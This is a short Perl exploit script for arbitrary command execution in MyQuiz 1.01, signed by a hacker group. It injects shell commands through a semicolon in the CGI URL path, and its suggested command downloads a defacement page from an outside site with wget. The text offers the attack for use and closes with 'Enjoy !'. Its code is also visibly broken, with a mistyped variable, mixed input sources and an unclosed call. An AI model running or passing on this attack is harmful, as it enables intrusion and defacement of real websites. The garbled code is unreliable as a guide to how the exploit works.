This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit. Athour : Hessam-x - www.hessamx.net +IHST : iran hackerz security team (hackerz.ir) #((Perl exploit)) #!/usr/bin/perl # => MyQuiz Remote Command Execution Exploit # -> By Hessam-x / www.hackerz.ir # manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>| # Iran Hackerz Security Team # Hessam-x : www.hessamx.net use LWP::Simple; print "Target(www.example.com)\$ "; chomp($targ = <STDIN>); print "path: (/cgi-bin/)\$ \n"; chomp($path=<STDIN>); print "command: (wget www.hackerz.ir/deface.htm)\$ \n"; chomp($comd=<STDIN>); $page=get("http://".$targ.$patch) || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $targ\n"; print "[~] Sending exploiting request, wait for some seconds/minutes...\n"; get("http://".$ARGV[0].$ARGV[1]."\;".$comd."\|" print "[+] Exploiting request done!\n"; print "Enjoy !";
